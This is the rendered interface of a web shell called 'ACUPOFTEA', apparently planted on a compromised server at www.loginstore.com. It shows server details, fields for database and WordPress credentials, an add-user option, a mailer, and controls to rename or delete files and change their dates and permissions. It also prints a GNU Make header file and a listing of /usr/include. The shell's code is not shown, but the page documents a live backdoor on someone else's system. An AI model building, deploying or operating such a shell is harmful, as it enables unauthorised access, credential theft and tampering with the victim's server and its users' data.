System
:
Linux loginstore 5.15.0-187-generic #197-Ubuntu SMP Fri Jul 17 19:17:01 UTC 2026 x86_64
Software
:
Apache/2.4.52 (Ubuntu)
Server
:
200.10.71.112
Domains
:
Cant read /etc/named.conf
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
include
/
10.10.0.71
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for www.loginstore.com made by tabagkayu.
Folder Name
File Name
File Content
File
gnumake.h
/* External interfaces usable by dynamic objects loaded into GNU Make. --THIS API IS A "TECHNOLOGY PREVIEW" ONLY. IT IS NOT A STABLE INTERFACE-- Copyright (C) 2013-2020 Free Software Foundation, Inc. This file is part of GNU Make. GNU Make is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 3 of the License, or (at your option) any later version. GNU Make is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. */ #ifndef _GNUMAKE_H_ #define _GNUMAKE_H_ /* Specify the location of elements read from makefiles. */ typedef struct { const char *filenm; unsigned long lineno; } gmk_floc; typedef char *(*gmk_func_ptr)(const char *nm, unsigned int argc, char **argv); #ifdef _WIN32 # ifdef GMK_BUILDING_MAKE # define GMK_EXPORT __declspec(dllexport) # else # define GMK_EXPORT __declspec(dllimport) # endif #else # define GMK_EXPORT #endif /* Free memory returned by the gmk_expand() function. */ GMK_EXPORT void gmk_free (char *str); /* Allocate memory in GNU make's context. */ GMK_EXPORT char *gmk_alloc (unsigned int len); /* Run $(eval ...) on the provided string BUFFER. */ GMK_EXPORT void gmk_eval (const char *buffer, const gmk_floc *floc); /* Run GNU make expansion on the provided string STR. Returns an allocated buffer that the caller must free with gmk_free(). */ GMK_EXPORT char *gmk_expand (const char *str); /* Register a new GNU make function NAME (maximum of 255 chars long). When the function is expanded in the makefile, FUNC will be invoked with the appropriate arguments. The return value of FUNC must be either NULL, in which case it expands to the empty string, or a pointer to the result of the expansion in a string created by gmk_alloc(). GNU make will free the memory when it's done. MIN_ARGS is the minimum number of arguments the function requires. MAX_ARGS is the maximum number of arguments (or 0 if there's no maximum). MIN_ARGS and MAX_ARGS may not exceed 255. The FLAGS value may be GMK_FUNC_DEFAULT, or one or more of the following flags OR'd together: GMK_FUNC_NOEXPAND: the arguments to the function will be not be expanded before FUNC is called. */ GMK_EXPORT void gmk_add_function (const char *name, gmk_func_ptr func, unsigned int min_args, unsigned int max_args, unsigned int flags); #define GMK_FUNC_DEFAULT 0x00 #define GMK_FUNC_NOEXPAND 0x01 #endif /* _GNUMAKE_H_ */
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
..
DIR
-
drwxr-xr-x
2024-02-16 06:37:05
arpa
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
asm-generic
DIR
-
drwxr-xr-x
2026-08-05 11:05:03
c++
DIR
-
drwxr-xr-x
2024-11-27 09:06:33
drm
DIR
-
drwxr-xr-x
2026-08-05 11:05:03
finclude
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
iproute2
DIR
-
drwxr-xr-x
2026-07-02 06:05:49
libdmmp
DIR
-
drwxr-xr-x
2024-02-16 06:53:04
linux
DIR
-
drwxr-xr-x
2026-08-05 11:05:03
misc
DIR
-
drwxr-xr-x
2026-08-05 11:05:03
mtd
DIR
-
drwxr-xr-x
2026-08-05 11:05:03
net
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
netash
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
netatalk
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
netax25
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
neteconet
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
netinet
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
netipx
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
netiucv
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
netpacket
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
netrom
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
netrose
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
nfs
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
node
DIR
-
drwxr-xr-x
2025-04-08 05:12:47
protocols
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
rdma
DIR
-
drwxr-xr-x
2026-08-05 11:05:03
rpc
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
rpcsvc
DIR
-
drwxr-xr-x
2024-11-27 09:06:31
scsi
DIR
-
drwxr-xr-x
2026-08-05 11:05:03
sound
DIR
-
drwxr-xr-x
2026-08-05 11:05:03
tirpc
DIR
-
drwxr-xr-x
2024-11-27 09:06:30
video
DIR
-
drwxr-xr-x
2026-08-05 11:05:03
x86_64-linux-gnu
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
xen
DIR
-
drwxr-xr-x
2026-08-05 11:05:03
xfs
DIR
-
drwxr-xr-x
2022-02-09 04:42:33
aio.h
text/x-c
7.56 KB
-rw-r--r--
2026-07-24 12:11:17
aliases.h
text/x-c
1.98 KB
-rw-r--r--
2026-07-24 12:11:17
alloca.h
text/x-c
1.17 KB
-rw-r--r--
2026-07-24 12:11:17
ar.h
text/x-c
1.69 KB
-rw-r--r--
2026-07-24 12:11:17
argp.h
text/x-c
24.95 KB
-rw-r--r--
2026-07-24 12:11:17
argz.h
text/x-c
5.91 KB
-rw-r--r--
2026-07-24 12:11:17
assert.h
text/x-c
4.53 KB
-rw-r--r--
2026-07-24 12:11:17
byteswap.h
text/x-c
1.42 KB
-rw-r--r--
2026-07-24 12:11:17
complex.h
text/x-c
7.95 KB
-rw-r--r--
2026-07-24 12:11:17
cpio.h
text/x-c
2.21 KB
-rw-r--r--
2026-07-24 12:11:17
crypt.h
text/x-c
10.87 KB
-rw-r--r--
2021-12-17 10:48:21
ctype.h
text/x-c
10.71 KB
-rw-r--r--
2026-07-24 12:11:17
dirent.h
text/x-c
12.22 KB
-rw-r--r--
2026-07-24 12:11:17
dlfcn.h
text/x-c
8.17 KB
-rw-r--r--
2026-07-24 12:11:17
elf.h
text/x-c
179.98 KB
-rw-r--r--
2026-07-24 12:11:17
endian.h
text/x-c
2.25 KB
-rw-r--r--
2026-07-24 12:11:17
envz.h
text/x-c
2.8 KB
-rw-r--r--
2026-07-24 12:11:17
err.h
text/x-c
2.29 KB
-rw-r--r--
2026-07-24 12:11:17
errno.h
text/x-c
1.64 KB
-rw-r--r--
2026-07-24 12:11:17
error.h
text/x-c
2.36 KB
-rw-r--r--
2026-07-24 12:11:17
execinfo.h
text/x-c
1.49 KB
-rw-r--r--
2026-07-24 12:11:17
fcntl.h
text/x-c
9.89 KB
-rw-r--r--
2026-07-24 12:11:17
features-time64.h
text/x-c
1.38 KB
-rw-r--r--
2026-07-24 12:11:17
features.h
text/x-c
17.44 KB
-rw-r--r--
2026-07-24 12:11:17
fenv.h
text/x-c
5.65 KB
-rw-r--r--
2026-07-24 12:11:17
fmtmsg.h
text/x-c
3.16 KB
-rw-r--r--
2026-07-24 12:11:17
fnmatch.h
text/x-c
2.24 KB
-rw-r--r--
2026-07-24 12:11:17
fstab.h
text/x-c
3.04 KB
-rw-r--r--
2026-07-24 12:11:17
fts.h
text/x-c
9.35 KB
-rw-r--r--
2026-07-24 12:11:17
ftw.h
text/x-c
6.19 KB
-rw-r--r--
2026-07-24 12:11:17
gawkapi.h
text/x-c
39.69 KB
-rw-r--r--
2026-07-20 10:38:47
gconv.h
text/x-c
4.11 KB
-rw-r--r--
2026-07-24 12:11:17
getopt.h
text/x-c
1.43 KB
-rw-r--r--
2026-07-24 12:11:17
glob.h
text/x-c
7.13 KB
-rw-r--r--
2026-07-24 12:11:17
gnu-versions.h
text/x-c
2.29 KB
-rw-r--r--
2026-07-24 12:11:17
gnumake.h
text/x-c
2.84 KB
-rw-r--r--
2022-02-15 03:32:21
grp.h
text/x-c
6.53 KB
-rw-r--r--
2026-07-24 12:11:17
gshadow.h
text/x-c
4.42 KB
-rw-r--r--
2026-07-24 12:11:17
iconv.h
text/x-c
1.81 KB
-rw-r--r--
2026-07-24 12:11:17
ifaddrs.h
text/x-c
2.77 KB
-rw-r--r--
2026-07-24 12:11:17
inttypes.h
text/x-c
8.14 KB
-rw-r--r--
2026-07-24 12:11:17
langinfo.h
text/x-c
17.43 KB
-rw-r--r--
2026-07-24 12:11:17
lastlog.h
text/x-c
126 B
-rw-r--r--
2026-07-24 12:11:17
libgen.h
text/x-c
1.35 KB
-rw-r--r--
2026-07-24 12:11:17
libintl.h
text/x-c
4.47 KB
-rw-r--r--
2026-07-24 12:11:17
limits.h
text/x-c
5.57 KB
-rw-r--r--
2026-07-24 12:11:17
link.h
text/x-c
7.62 KB
-rw-r--r--
2026-07-24 12:11:17
locale.h
text/x-c
7.5 KB
-rw-r--r--
2026-07-24 12:11:17
malloc.h
text/x-c
5.84 KB
-rw-r--r--
2026-07-24 12:11:17
math.h
text/x-c
48.7 KB
-rw-r--r--
2026-07-24 12:11:17
mcheck.h
text/x-c
2.38 KB
-rw-r--r--
2026-07-24 12:11:17
memory.h
text/x-c
956 B
-rw-r--r--
2026-07-24 12:11:17
mntent.h
text/x-c
3.28 KB
-rw-r--r--
2026-07-24 12:11:17
monetary.h
text/x-c
1.92 KB
-rw-r--r--
2026-07-24 12:11:17
mpath_cmd.h
text/x-c
4.06 KB
-rw-r--r--
2023-10-31 10:21:59
mpath_persist.h
text/x-c
11.22 KB
-rw-r--r--
2023-10-31 10:21:59
mqueue.h
text/x-c
4.5 KB
-rw-r--r--
2026-07-24 12:11:17
netdb.h
text/x-c
27.79 KB
-rw-r--r--
2026-07-24 12:11:17
nl_types.h
text/x-c
1.71 KB
-rw-r--r--
2026-07-24 12:11:17
nss.h
text/x-c
14.07 KB
-rw-r--r--
2026-07-24 12:11:17
obstack.h
text/x-c
20.81 KB
-rw-r--r--
2026-07-24 12:11:17
paths.h
text/x-c
2.91 KB
-rw-r--r--
2026-07-24 12:11:17
poll.h
text/x-c
22 B
-rw-r--r--
2026-07-24 12:11:17
printf.h
text/x-c
6.71 KB
-rw-r--r--
2026-07-24 12:11:17
proc_service.h
text/x-c
3.4 KB
-rw-r--r--
2026-07-24 12:11:17
pthread.h
text/x-c
47.24 KB
-rw-r--r--
2026-07-24 12:11:17
pty.h
text/x-c
1.53 KB
-rw-r--r--
2026-07-24 12:11:17
pwd.h
text/x-c
6.17 KB
-rw-r--r--
2026-07-24 12:11:17
re_comp.h
text/x-c
963 B
-rw-r--r--
2026-07-24 12:11:17
regex.h
text/x-c
25.3 KB
-rw-r--r--
2026-07-24 12:11:17
regexp.h
text/x-c
1.35 KB
-rw-r--r--
2026-07-24 12:11:17
resolv.h
text/x-c
11.96 KB
-rw-r--r--
2026-07-24 12:11:17
sched.h
text/x-c
4.92 KB
-rw-r--r--
2026-07-24 12:11:17
search.h
text/x-c
5.32 KB
-rw-r--r--
2026-07-24 12:11:17
semaphore.h
text/x-c
3.38 KB
-rw-r--r--
2026-07-24 12:11:17
setjmp.h
text/x-c
3.12 KB
-rw-r--r--
2026-07-24 12:11:17
sgtty.h
text/x-c
1.31 KB
-rw-r--r--
2026-07-24 12:11:17
shadow.h
text/x-c
5.34 KB
-rw-r--r--
2026-07-24 12:11:17
signal.h
text/x-c
12.73 KB
-rw-r--r--
2026-07-24 12:11:17
spawn.h
text/x-c
8.08 KB
-rw-r--r--
2026-07-24 12:11:17
stab.h
text/x-c
264 B
-rw-r--r--
2026-07-24 12:11:17
stdc-predef.h
text/x-c
2.4 KB
-rw-r--r--
2026-07-24 12:11:17
stdint.h
text/x-c
8.28 KB
-rw-r--r--
2026-07-24 12:11:17
stdio.h
text/x-c
30.45 KB
-rw-r--r--
2026-07-24 12:11:17
stdio_ext.h
text/x-c
2.73 KB
-rw-r--r--
2026-07-24 12:11:17
stdlib.h
text/x-c
35.54 KB
-rw-r--r--
2026-07-24 12:11:17
string.h
text/x-c
19 KB
-rw-r--r--
2026-07-24 12:11:17
strings.h
text/x-c
4.64 KB
-rw-r--r--
2026-07-24 12:11:17
sudo_plugin.h
text/x-c
11.64 KB
-rw-r--r--
2026-03-02 01:08:06
syscall.h
text/x-c
25 B
-rw-r--r--
2026-07-24 12:11:17
sysexits.h
text/x-c
5.11 KB
-rw-r--r--
2026-07-24 12:11:17
syslog.h
text/x-c
24 B
-rw-r--r--
2026-07-24 12:11:17
tar.h
text/x-c
3.66 KB
-rw-r--r--
2026-07-24 12:11:17
termio.h
text/x-c
214 B
-rw-r--r--
2026-07-24 12:11:17
termios.h
text/x-c
3.51 KB
-rw-r--r--
2026-07-24 12:11:17
tgmath.h
text/x-c
43.61 KB
-rw-r--r--
2026-07-24 12:11:17
thread_db.h
text/x-c
15.65 KB
-rw-r--r--
2026-07-24 12:11:17
threads.h
text/x-c
7.51 KB
-rw-r--r--
2026-07-24 12:11:17
time.h
text/x-c
14.49 KB
-rw-r--r--
2026-07-24 12:11:17
ttyent.h
text/x-c
2.44 KB
-rw-r--r--
2026-07-24 12:11:17
uchar.h
text/x-c
1.96 KB
-rw-r--r--
2026-07-24 12:11:17
ucontext.h
text/x-c
1.99 KB
-rw-r--r--
2026-07-24 12:11:17
ulimit.h
text/x-c
1.55 KB
-rw-r--r--
2026-07-24 12:11:17
unistd.h
text/x-c
43.91 KB
-rw-r--r--
2026-07-24 12:11:17
utime.h
text/x-c
1.86 KB
-rw-r--r--
2026-07-24 12:11:17
utmp.h
text/x-c
3.15 KB
-rw-r--r--
2026-07-24 12:11:17
utmpx.h
text/x-c
4 KB
-rw-r--r--
2026-07-24 12:11:17
values.h
text/x-c
1.91 KB
-rw-r--r--
2026-07-24 12:11:17
wait.h
text/x-c
22 B
-rw-r--r--
2026-07-24 12:11:17
wchar.h
text/x-c
31.05 KB
-rw-r--r--
2026-07-24 12:11:17
wctype.h
text/x-c
5.42 KB
-rw-r--r--
2026-07-24 12:11:17
wordexp.h
text/x-c
2.44 KB
-rw-r--r--
2026-07-24 12:11:17
~ ACUPOFTEA - www.loginstore.com